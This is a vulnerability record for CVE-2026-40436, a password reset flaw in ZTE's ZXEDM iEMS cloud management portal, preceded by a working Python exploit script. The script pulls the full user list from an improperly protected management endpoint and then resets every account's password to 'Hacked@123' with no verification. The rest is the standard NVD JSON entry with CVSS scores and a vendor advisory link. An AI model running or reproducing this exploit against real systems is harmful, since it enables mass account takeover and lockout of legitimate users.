CVE-2026-40436

import requests # Target configuration target_host = "https://<target-ip>" base_url = f"{target_host}/api" # Attacker's session (assuming low privilege login) session = requests.Session() # login logic here if needed... # Step 1: Exploit User List Enumeration (Broken Access Control) print("[+] Attempting to enumerate users...") list_url = f"{base_url}/management/users/list" try: response = session.get(list_url, verify=False) if response.status_code == 200: users = response.json().get('data', []) print(f"[+] Successfully retrieved {len(users)} users.") # Step 2: Exploit Password Reset reset_url = f"{base_url}/management/users/reset_password" headers = {'Content-Type': 'application/json'} for user in users: username = user.get('username') user_id = user.get('id') print(f"[*] Attempting to reset password for: {username}") # Payload to reset password without verification payload = { "user_id": user_id, "new_password": "Hacked@123" } reset_resp = session.post(reset_url, json=payload, headers=headers, verify=False) if reset_resp.status_code == 200: print(f"[+] Password reset successful for {username}") else: print(f"[-] Failed to reset password for {username}") else: print("[-] Failed to retrieve user list.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-40436", "sourceIdentifier": "[email protected]", "published": "2026-04-13T07:16:50.393", "lastModified": "2026-05-12T19:10:40.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ZTE ZXEDM iEMS product has a password reset vulnerability for any user.Because the management of the cloud EMS portal does not properly control access to the user list acquisition function, attackers can read all user list information through the user list interface. Attackers can reset the passwords of obtained user information, causing risks such as unauthorized operations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zte:zxesm_iems:16.25.42.04:*:*:*:*:*:*:*", "matchCriteriaId": "DF4718BA-9949-4677-B0A2-4DCB4EFF11A4"}]}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/support/bulletin/security?lang=en_US&t=0.7465962531829456", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}